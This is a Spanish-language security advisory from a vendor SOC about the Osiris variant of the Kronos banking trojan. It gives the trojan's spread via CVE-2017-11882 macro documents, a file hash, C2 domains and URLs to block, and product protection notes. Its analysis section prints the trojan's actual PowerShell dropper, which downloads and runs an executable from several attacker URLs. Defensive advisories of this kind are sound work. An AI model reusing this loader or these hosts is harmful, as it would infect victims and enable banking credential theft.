UPDATE! Variante del Troyano Kronos (Osiris) peligroso troyano bancario

  • 12
  • 19 octubre, 2018

 

osiris

Desde nuestro SOC, seguimos analizando el comportamiento de la variante del troyano Kronos, la misma se conoce como Osiris.

 

ANÁLISIS Y COMPORTAMIENTO

Este es un troyano bancario tiene el siguiente comportamiento:

Utiliza inyecciones web G/P/L estilo Zeus, un keylogger para registrar las pulsaciones del teclado y un servidor VNC, aunque también presenta algunas peculiaridades, como el cifrado del tráfico para pasarlo por la red Tor hacia el servidor de mando y control.

La nueva variante del troyano kronos detectada y analizado por el S.O.C el dia 02/10, es un malware troyano polimórfico (cambia automáticamente su código cada cierto tiempo o con acciones determinadas del dispositivo), haciendo que sea más difícil para los antivirus detectar su firma, anteriormente este malware se consideraba del tipo bancario debido a su comportamiento, hoy en día está integrado con varias funciones maliciosas debido que consta de varios módulos que descarga de su servidor C&C(comando y control).

El principal medio de difusión utilizado es el spam mediante e-mail, adjuntando documentos de Microsoft Word o RTF específicamente diseñados con macros, los cuales tienen código malicioso powershell encriptado que descarga el malware y luego lo ejecuta. Utiliza la vulnerabilidad CVE-2017-11882, un desbordamiento de buffer conocido de Microsoft Office, permitiendo al hacker llevar a cabo una ejecución de código arbitrario sobre la máquina objetivo.

Detalles del archivo:

  • Nombre del archivo: Nuevo-contrato.doc
  • Tamaño del archivo: 128768 bytes
  • Tipo de archivo: Microsoft Office Word
  • MD5: 84ef0539de8e8b8f062b379ec603017b

RECOMENDACIONES:

Instalar el parche de de seguridad de Microsoft Office: https://www.microsoft.com/en-us/download/details.aspx?id=56250

Verificar si hay tráfico hacia los siguientes dominios, en caso tal, realizar un bloqueo de los mismos ya que es la manera de comunicación:

  • http://avast.dongguanmolds.com/abc.123
  • 28.14.219
  • 215.247.106

Tener el SO Actualizado a la ultima versión y con todos los parches de seguridad.

DNS Requests

Recomendamos bloquear las conexiones hacia la siguiente dirección:

studio2321.com

Response: A 69.163.216.158

HTTP Requests

Recomendamos aplicar bloqueos del proxy de navegación a las siguientes URLs:

URL: http://studio2321.com:9040/9QT9H0mr

DATA: GET /9QT9H0mr HTTP/1.1 Host: studio2321.com Connection: Keep-Alive

URL: http://studio2321.com:9040/9QT9H0mr/

DATA: GET /9QT9H0mr/ HTTP/1.1 Host: studio2321.com

URL: http://74.89.23.180:7080/

DATA: GET / HTTP/1.1

Cookie: 64048=mEe4DhPslSvzR+7C1uNb/1Qs26pFPDBHIgA7GMSXHm5435WfiV7EKFn6sHHsIqqHn D+cswdvXeMge+Wav7rcmQASvkiOsZrPdEaiCOjgL7g1JGwWGYqJwtTzvRy9nHbbs8h2oKV75I E+lYevrz4mDk9nUv9aEx19Mp2b79z8rqN53ysfUe3TVyIHCK4sZjDM8m9w764YMo4L1nZoqkkx lqLF2nsWWk2ovZ05ceP92f7eRs3+mjj2OeyEy0IFkGi+sbUfFGYwCRAGvJAYKl5UbOQNXNQnx Yvq73mHfnuHt3U97276yA/YAFSNyvoUbg3UbEjSeOMtx5q7J+PdDr5qQubURXmKeFBjMWgw 6lrfAtIqpYNiO2hjU7msFNIP9bt91f9lUL2yV2phbjBXpPCVSUEHLQLTQsMrn/4YRJBsZYDzYP5 N Host: 74.89.23.180:7080

Connection: Keep-Alive

Cache-Control: no-cache

URL: http://sightspansecurity.com/2aw9z1o

URL: http://landersmadden.com/mm405kH

URL: http://kingaardvark.com/HJJbLFNs

URL: http://interconformity.com/uMvDH9lmnH

URL: http://grupoembatec.com/2IH19v0

URL: http://motiondev.com.br/nmbSJF8d3O/

URL: http://aile.pub/VijPdPci/

URL: http://gidamikrobiyoloji.com/qMXm2AO/

URL: http://perkasa.undiksha.ac.id/wp-content/uploads/taTj65QDg/

 

CONOCE COMO PROTEGERTE:

Clientes SOC RAN: Si sos cliente de nuestro SOC ya estas protegido.

Clientes con Cylance: Están protegidos teniendo habilitada la política Fase 3 (AutoCuarentenamiento, Protección de Memoria y Control de Script).

Clientes con Proofpoint

Están protegidos a través del del Sandboxing y Heurística del producto.

Clientes con ClearSwift: 
Se recomienda el bloqueo de extensiones potencialmente peligrosas (.DOC, .DOCX, .XLS, etc).  Informando al usuario final la cuarentena del archivo para pedir la liberación bajo demanda previo análisis.

Cliente con McAfee: 
Se encuentran protegidos si tienen configurado correctamente el entorno TIE y ATD. De lo contrario es necesario cargar el extraDAT. consúltanos para más información.

Si tienes dudas al respecto no dudes en contactarnos más información y consultas: expertos@ransecurity.com 

 

MAS DATOS DE LA AMENAZA: 

El documento adjunto que contiene este troyano cuenta con un script embebido, que al ejecutarse, genera una conexión hacia las URLs del atacante para descargar un archivo que luego de su ejecución en el equipo de la víctima, genera la creación de los servicios y procesos maliciosos que recopilan la información que luego será enviada al atacante.

Código ejecutado:

  • powershell $mXP=new-object Net.WebClient;$QiV=’http://studio2321.com/9QT9H0mr@http://aile.pub/VijPdPci@http://motiondev.com.br/nmbS
  • JF8d3O@http://perkasa.undiksha.ac.id/wp-content/uploads/taTj65QDg@http://gidamikrobiyoloji.com/qMXm2AO’.Split(‘@’);$zwq= ‘532’;$ILh=$env:public+’\’+$zwq+’.exe';foreach($tpd in $QiV){try{$mXP.DownloadFile($tpd, $ILh);Invoke-Item $ILh;break;}catch{}}
  • C:\Users\Public\532.exe
  • “C:\Windows\SysWOW64\iwamregtaupe.exe”

Servicios creados

  • iwamregtaupe

Servicios iniciados

  • iwamregtaupe

Procesos

  • EXE PID: 360, Parent PID: 1240
  • exe PID: 1928, Parent PID: 360
  • exe PID: 2080, Parent PID: 1928
  • exe PID: 2308, Parent PID: 2080
  • exe PID: 2400, Parent PID: 2308
  • exe PID: 484, Parent PID: 388
  • exe PID: 2656, Parent PID: 484

 

Más información y consultas: expertos@ransecurity.com

Leave a Reply

CONTACTO

E-mail: Soporte técnico: helpdesk@ransecurity.com Info: expertos@ransecurity.com
RANSecurity Argentina: (+54 11) 5353 9999
RANSecurity Chile: Tel: (+562) 3223 9532
RANSecurity Perú: Tel: (+51 1) 711 4764